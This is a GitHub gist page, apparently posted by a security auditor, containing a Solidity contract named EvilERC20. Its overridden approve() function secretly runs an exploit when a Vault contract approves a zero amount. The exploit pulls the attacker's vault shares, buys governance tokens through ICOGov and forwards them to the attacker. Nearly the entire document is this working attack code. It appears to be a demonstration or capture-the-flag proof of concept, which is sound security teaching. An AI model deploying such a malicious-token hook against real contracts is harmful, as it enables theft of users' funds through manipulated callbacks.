-
-
Save inspexAuditor/93e6d61d3cc4fd2cdaecf779d3799dcf to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
//SPDX-License-Identifier: MIT | |
pragma solidity 0.8.13; | |
import "@openzeppelin/contracts/token/ERC20/ERC20.sol"; | |
import "./Vault.sol"; | |
import "./ICOGov.sol"; | |
import "./GOVToken.sol"; | |
contract EvilERC20 is ERC20 { | |
Vault vault; | |
ICOGov icoGov; | |
address attackerAddr; | |
GOVToken govToken; | |
constructor(Vault _vault, ICOGov _icoGov, GOVToken _govToken) ERC20("EvilToken", "EVIL") { | |
vault = _vault; | |
icoGov = _icoGov; | |
attackerAddr = msg.sender; | |
govToken = _govToken; | |
_mint(attackerAddr, 3000000 ether); | |
} | |
function approve(address spender, uint256 amount) public virtual override returns (bool) { | |
address owner = _msgSender(); | |
_approve(owner, spender, amount); | |
// Trigger the attack | |
if (amount == 0 && owner == address(vault)) { | |
// Transfer $VT from attacker | |
uint256 share = vault.balanceOf(attackerAddr); | |
vault.transferFrom(attackerAddr, address(this), share); | |
// Approve $VT to be used by ICOGov | |
vault.approve(address(icoGov), share); | |
// Buy the token | |
icoGov.buyToken(share); | |
// Transfer token bought back to the attacker | |
govToken.transfer(attackerAddr, govToken.balanceOf(address(this))); | |
} | |
return true; | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment